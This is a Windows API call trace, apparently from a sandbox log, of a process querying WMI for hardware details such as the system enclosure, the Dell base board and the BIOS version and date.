[0669.491] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.512] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0669.513] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd850
[0669.513] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0669.513] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x2c) returned 0x22ac10
[0669.513] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd850 | out: hHeap=0x1c0000) returned 1
[0669.514] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0xc8) returned 0x1f6760
[0669.515] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1f6760 | out: hHeap=0x1c0000) returned 1
[0669.515] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x34) returned 0x22ac50
[0669.515] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22ac50 | out: hHeap=0x1c0000) returned 1
[0669.516] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x80) returned 0x213a90
[0669.516] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22ac10 | out: hHeap=0x1c0000) returned 1
[0669.521] memcpy (in: _Dst=0x134e698, _Src=0x22feac, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.522] memcpy (in: _Dst=0x134e698, _Src=0x22f7b9, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.523] memcpy (in: _Dst=0x134e698, _Src=0x22feb4, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.523] memcpy (in: _Dst=0x134e698, _Src=0x22f7bf, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.523] memcpy (in: _Dst=0x134e698, _Src=0x22f7c1, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.547] memcpy (in: _Dst=0x134e698, _Src=0x299009, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.547] memcpy (in: _Dst=0x134e698, _Src=0x29900b, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.548] memcpy (in: _Dst=0x134e698, _Src=0x29900d, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.548] memcpy (in: _Dst=0x134e698, _Src=0x29900f, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.549] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x227420
[0669.549] SafeArrayGetElemsize (psa=0x22b0a0) returned 0x8
[0669.549] memcpy (in: _Dst=0x134e480, _Src=0x134e3a8, _Size=0x8 | out: _Dst=0x134e480) returned 0x134e480
[0669.550] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x227420 | out: hHeap=0x1c0000) returned 1
[0669.550] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa770 | out: hHeap=0x1c0000) returned 1
[0669.550] memcpy (in: _Dst=0x134e698, _Src=0x23b40e, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.562] DllGetClassObject (in: rclsid=0x201550*(Data1=0xd63a5850, Data2=0x8f16, Data3=0x11cf, Data4=([0]=0x9f, [1]=0x47, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbf, [6]=0x34, [7]=0x5c)), riid=0x13fd45308*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x134e450 | out: ppv=0x134e450*=0x3eef20) returned 0x0
[0669.625] EtwEventWrite (RegHandle=0x1100010001, EventDescriptor=0x7fefa2a60b0, UserDataCount=0x5, UserData=0x134e610) returned 0x0
[0669.635] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ ()
[0669.652] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.717] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.717] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.729] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0669.729] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x22f170
[0669.729] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0669.729] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x2c) returned 0x22afd0
[0669.729] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22f170 | out: hHeap=0x1c0000) returned 1
[0669.730] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0xc8) returned 0x1f6760
[0669.730] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1f6760 | out: hHeap=0x1c0000) returned 1
[0669.730] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x38) returned 0x21e540
[0669.731] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x21e540 | out: hHeap=0x1c0000) returned 1
[0669.731] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x84) returned 0x213d60
[0669.731] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22afd0 | out: hHeap=0x1c0000) returned 1
[0669.734] memcpy (in: _Dst=0x134e698, _Src=0x23396c, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.736] memcpy (in: _Dst=0x134e698, _Src=0x233279, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.736] memcpy (in: _Dst=0x134e698, _Src=0x233974, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.736] memcpy (in: _Dst=0x134e698, _Src=0x23327f, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.736] memcpy (in: _Dst=0x134e698, _Src=0x233281, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.749] memcpy (in: _Dst=0x134e698, _Src=0x299189, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.750] memcpy (in: _Dst=0x134e698, _Src=0x29918b, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.750] memcpy (in: _Dst=0x134e698, _Src=0x29918d, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.750] memcpy (in: _Dst=0x134e698, _Src=0x29918f, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.750] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x2198b0
[0669.750] SafeArrayGetElemsize (psa=0x21e690) returned 0x8
[0669.751] memcpy (in: _Dst=0x134e480, _Src=0x134e3a8, _Size=0x8 | out: _Dst=0x134e480) returned 0x134e480
[0669.751] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x2198b0 | out: hHeap=0x1c0000) returned 1
[0669.751] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa8f0 | out: hHeap=0x1c0000) returned 1
[0669.751] memcpy (in: _Dst=0x134e698, _Src=0x233fce, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.798] EtwEventWrite (RegHandle=0x1100010001, EventDescriptor=0x7fefa2a60b0, UserDataCount=0x5, UserData=0x134e610) returned 0x0
[0669.803] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ ()
[0669.818] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.836] SetLastError (dwErrCode=0x0)
[0669.836] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0669.836] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0669.836] SetLastError (dwErrCode=0x0)
[0669.836] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9b0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9b0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0669.836] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9f0
[0669.836] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0669.837] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd4b0
[0669.837] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd4b0, pulNumLanguages=0x134e8a8 | out: pulNumLanguages=0x134e8a8) returned 1
[0669.837] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd4b0 | out: hHeap=0x1c0000) returned 1
[0669.903] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fda00
[0669.903] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fda00, pulNumLanguages=0x134e8a0 | out: pulNumLanguages=0x134e8a0) returned 1
[0669.904] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fda00 | out: hHeap=0x1c0000) returned 1
[0669.918] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.931] SetLastError (dwErrCode=0x0)
[0669.931] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0669.931] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9f0
[0669.931] SetLastError (dwErrCode=0x0)
[0669.931] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9f0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9f0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0669.931] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fda00
[0669.931] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9f0 | out: hHeap=0x1c0000) returned 1
[0669.931] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd4b0
[0669.931] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd4b0, pulNumLanguages=0x134e8a8 | out: pulNumLanguages=0x134e8a8) returned 1
[0669.931] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd4b0 | out: hHeap=0x1c0000) returned 1
[0669.935] malloc (_Size=0xa8) returned 0x403620
[0669.936] LoadLibraryW (lpLibFileName="WMI.DLL") returned 0x75830000
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiQueryAllDataW") returned 0x7feff338440
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiQuerySingleInstanceW") returned 0x7feff345600
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiSetSingleItemW") returned 0x7feff37b080
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiSetSingleInstanceW") returned 0x7feff37b350
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiExecuteMethodW") returned 0x7feff37abd0
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiNotificationRegistrationW") returned 0x7feff32a760
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiMofEnumerateResourcesW") returned 0x7feff329660
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiFileHandleToInstanceNameW") returned 0x7feff37a760
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiDevInstToInstanceNameW") returned 0x7feff3457e0
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiQueryGuidInformation") returned 0x7feff329a70
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiOpenBlock") returned 0x7feff338380
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiCloseBlock") returned 0x7feff338650
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiFreeBuffer") returned 0x7feff329b10
[0669.943] GetProcAddress (hModule=0x75830000, lpProcName="WmiEnumerateGuids") returned 0x7feff37a580
[0669.943] malloc (_Size=0x18) returned 0x3ef040
[0669.943] WmiOpenBlock () returned 0x0
[0669.946] malloc (_Size=0x1000) returned 0x4036d0
[0669.946] WmiQueryAllDataW () returned 0x0
[0669.947] WmiCloseBlock () returned 0x0
[0669.947] malloc (_Size=0x48) returned 0x3ed680
[0669.947] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x218
[0669.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7fef4a510f0, lpParameter=0x7fef4c23eb0, dwCreationFlags=0x0, lpThreadId=0x7fef4c23eb0 | out: lpThreadId=0x7fef4c23eb0*=0x138) returned 0x21c
[0669.950] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x134df48 | out: lpSystemTimeAsFileTime=0x134df48*(dwLowDateTime=0xa96e3230, dwHighDateTime=0x1dab599))
[0669.950] SetEvent (hEvent=0x218) returned 1
[0669.950] malloc (_Size=0x9a0) returned 0x4046e0
[0669.950] malloc (_Size=0x420) returned 0x405090
[0669.959] LoadStringW (in: hInstance=0x7fef4a50000, uID=0x3f, lpBuffer=0x134de70, cchBufferMax=256 | out: lpBuffer="System Enclosure") returned 0x10
[0669.964] lstrlenW (lpString="Inventec") returned 8
[0669.966] GetProcAddress (hModule=0x7feff600000, lpProcName=0x8) returned 0x7feff6013f0
[0669.966] SafeArrayPutElement (psa=0x234950, rgIndices=0x134e0e4, pv=0x134e0e0) returned 0x0
[0669.966] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x78) returned 0x1fa570
[0669.966] SafeArrayGetDim (psa=0x234950) returned 0x1
[0669.966] SafeArrayGetLBound (in: psa=0x234950, nDim=0x1, plLbound=0x134dea4 | out: plLbound=0x134dea4) returned 0x0
[0669.966] SafeArrayGetUBound (in: psa=0x234950, nDim=0x1, plUbound=0x134deb0 | out: plUbound=0x134deb0) returned 0x0
[0669.966] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233e30
[0669.967] SafeArrayGetDim (psa=0x234950) returned 0x1
[0669.967] SafeArrayGetUBound (in: psa=0x234950, nDim=0x1, plUbound=0x134de68 | out: plUbound=0x134de68) returned 0x0
[0669.967] SafeArrayGetElemsize (psa=0x234950) returned 0x2
[0669.967] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233e60
[0669.967] SafeArrayGetElemsize (psa=0x234a50) returned 0x2
[0669.967] SafeArrayGetElement (in: psa=0x234950, rgIndices=0x134dd40, pv=0x134dd70 | out: pv=0x134dd70) returned 0x0
[0669.967] SafeArrayPutElement (psa=0x234a50, rgIndices=0x233e60, pv=0x134dd78) returned 0x0
[0669.967] SafeArrayRedim (in: psa=0x234a50, psaboundNew=0x233e78 | out: psa=0x234a50) returned 0x0
[0669.968] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233e60 | out: hHeap=0x1c0000) returned 1
[0669.969] SafeArrayGetLBound (in: psa=0x234a50, nDim=0x1, plLbound=0x134ddd4 | out: plLbound=0x134ddd4) returned 0x0
[0669.969] SafeArrayGetUBound (in: psa=0x234a50, nDim=0x1, plUbound=0x134ddd0 | out: plUbound=0x134ddd0) returned 0x0
[0669.969] SafeArrayGetElement (in: psa=0x234a50, rgIndices=0x134de78, pv=0x134de08 | out: pv=0x134de08) returned 0x0
[0669.970] SafeArrayPutElement (psa=0x2349d0, rgIndices=0x134de78, pv=0x134de08) returned 0x0
[0669.971] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233e30 | out: hHeap=0x1c0000) returned 1
[0669.971] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0669.971] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x78) returned 0x1fa570
[0669.971] SafeArrayGetDim (psa=0x2349d0) returned 0x1
[0669.971] SafeArrayGetLBound (in: psa=0x2349d0, nDim=0x1, plLbound=0x134dd04 | out: plLbound=0x134dd04) returned 0x0
[0669.971] SafeArrayGetUBound (in: psa=0x2349d0, nDim=0x1, plUbound=0x134dd10 | out: plUbound=0x134dd10) returned 0x0
[0669.971] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233e30
[0669.971] SafeArrayGetDim (psa=0x2349d0) returned 0x1
[0669.972] SafeArrayGetUBound (in: psa=0x2349d0, nDim=0x1, plUbound=0x134dcc8 | out: plUbound=0x134dcc8) returned 0x0
[0669.972] SafeArrayGetElemsize (psa=0x2349d0) returned 0x4
[0669.972] SafeArrayGetElement (in: psa=0x2349d0, rgIndices=0x134de00, pv=0x134de30 | out: pv=0x134de30) returned 0x0
[0669.972] SafeArrayGetElement (in: psa=0x2349d0, rgIndices=0x134de00, pv=0x134de30 | out: pv=0x134de30) returned 0x0
[0669.973] memcpy (in: _Dst=0x134ddf8, _Src=0x1fda20, _Size=0x4 | out: _Dst=0x134ddf8) returned 0x134ddf8
[0669.974] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233e30 | out: hHeap=0x1c0000) returned 1
[0669.978] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0669.978] lstrlenW (lpString="PVT") returned 3
[0669.979] lstrlenW (lpString="JP7XY4J") returned 7
[0669.979] lstrlenW (lpString="To Be Filled By O.E.M.") returned 22
[0669.981] GetProcAddress (hModule=0x7feff600000, lpProcName=0x9) returned 0x7feff601180
[0669.987] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd9f0
[0669.987] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd9f0, pulNumLanguages=0x134e8a0 | out: pulNumLanguages=0x134e8a0) returned 1
[0669.987] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9f0 | out: hHeap=0x1c0000) returned 1
[0669.994] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0670.007] SetLastError (dwErrCode=0x0)
[0670.007] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0670.007] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fda00
[0670.007] SetLastError (dwErrCode=0x0)
[0670.007] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fda00, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fda00, pcchLanguagesBuffer=0x134e7b0) returned 1
[0670.007] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9f0
[0670.007] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fda00 | out: hHeap=0x1c0000) returned 1
[0670.007] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x22f530
[0670.008] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x22f530, pulNumLanguages=0x134e8a8 | out: pulNumLanguages=0x134e8a8) returned 1
[0670.008] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22f530 | out: hHeap=0x1c0000) returned 1
[0670.020] LoadStringW (in: hInstance=0x7fef4a50000, uID=0x3e, lpBuffer=0x134de80, cchBufferMax=256 | out: lpBuffer="Base Board") returned 0xa
[0670.022] lstrlenW (lpString="Dell") returned 4
[0670.022] lstrlenW (lpString="0D61XP") returned 6
[0670.023] lstrlenW (lpString="A00") returned 3
[0670.023] lstrlenW (lpString="..CN747510BO0504.") returned 17
[0670.029] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fda00
[0670.030] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fda00, pulNumLanguages=0x134e8a0 | out: pulNumLanguages=0x134e8a0) returned 1
[0670.030] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fda00 | out: hHeap=0x1c0000) returned 1
[0670.066] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0670.084] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0670.096] SetLastError (dwErrCode=0x0)
[0670.096] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0670.096] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9f0
[0670.096] SetLastError (dwErrCode=0x0)
[0670.096] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9f0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9f0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0670.097] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fda00
[0670.097] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9f0 | out: hHeap=0x1c0000) returned 1
[0670.097] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x22f530
[0670.097] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x22f530, pulNumLanguages=0x134e8a8 | out: pulNumLanguages=0x134e8a8) returned 1
[0670.097] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22f530 | out: hHeap=0x1c0000) returned 1
[0670.108] _wtoi (_String="04") returned 4
[0670.108] _wtoi (_String="14") returned 14
[0670.108] GetLocalTime (in: lpSystemTime=0x134d530 | out: lpSystemTime=0x134d530*(wYear=0x7e8, wMonth=0x6, wDayOfWeek=0x1, wDay=0x3, wHour=0xb, wMinute=0x25, wSecond=0x21, wMilliseconds=0x3c0))
[0670.109] _wtoi (_String="01") returned 1
[0670.109] _vsnwprintf (in: _Buffer=0x134d540, _BufferCount=0x63, _Format="%d%02d%02d000000.000000+000", _ArgList=0x134d4c8 | out: _Buffer="20140401000000.000000+000") returned 25
[0670.110] RegQueryValueExW (in: hKey=0x228, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x134d6f4, lpData=0x134ddb0, lpcbData=0x134d6e0*=0x410 | out: lpType=0x134d6f4*=0x7, lpData=0x134ddb0*, lpcbData=0x134d6e0*=0x18) returned 0x0
[0670.110] GetProcAddress (hModule=0x7feff600000, lpProcName=0x17) returned 0x7feff607080
[0670.111] SafeArrayAccessData (in: psa=0x234a10, ppvData=0x134d700 | out: ppvData=0x134d700) returned 0x0
[0670.111] GetProcAddress (hModule=0x7feff600000, lpProcName=0x18) returned 0x7feff6070b0
[0670.111] SafeArrayUnaccessData (psa=0x234a10) returned 0x0
[0670.111] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x78) returned 0x1fa570
[0670.111] SafeArrayGetDim (psa=0x234a90) returned 0x1
[0670.111] SafeArrayGetLBound (in: psa=0x234a90, nDim=0x1, plLbound=0x134d424 | out: plLbound=0x134d424) returned 0x0
[0670.111] SafeArrayGetUBound (in: psa=0x234a90, nDim=0x1, plUbound=0x134d430 | out: plUbound=0x134d430) returned 0x0
[0670.111] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233ec0
[0670.111] SafeArrayGetDim (psa=0x234a90) returned 0x1
[0670.111] SafeArrayGetUBound (in: psa=0x234a90, nDim=0x1, plUbound=0x134d3e8 | out: plUbound=0x134d3e8) returned 0x0
[0670.111] SafeArrayGetElemsize (psa=0x234a90) returned 0x8
[0670.112] SafeArrayGetElement (in: psa=0x234a90, rgIndices=0x134d378, pv=0x134d380 | out: pv=0x134d380) returned 0x0
[0670.112] memcpy (in: _Dst=0x134d378, _Src=0x1fda20, _Size=0x8 | out: _Dst=0x134d378) returned 0x134d378
[0670.113] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233ec0 | out: hHeap=0x1c0000) returned 1
[0670.113] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0670.118] lstrlenW (lpString="JP7XY4J") returned 7
[0670.119] lstrlenW (lpString="Dell Inc.") returned 9
[0670.120] lstrlenW (lpString="03/09/2011") returned 10
[0670.120] _wtoi (_String="03") returned 3
[0670.120] _wtoi (_String="2011") returned 2011
[0670.129] GetLocalTime (in: lpSystemTime=0x134d530 | out: lpSystemTime=0x134d530*(wYear=0x7e8, wMonth=0x6, wDayOfWeek=0x1, wDay=0x3, wHour=0xb, wMinute=0x25, wSecond=0x21, wMilliseconds=0x3d0))
[0670.129] _wtoi (_String="09") returned 9
[0670.129] _vsnwprintf (in: _Buffer=0x134d540, _BufferCount=0x63, _Format="%d%02d%02d000000.000000+000", _ArgList=0x134d4c8 | out: _Buffer="20110309000000.000000+000") returned 25
[0670.130] lstrlenW (lpString="1.56") returned 4
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d694) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.132] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.132] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.132] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x78) returned 0x1fa570
[0670.132] SafeArrayGetDim (psa=0x234a10) returned 0x1
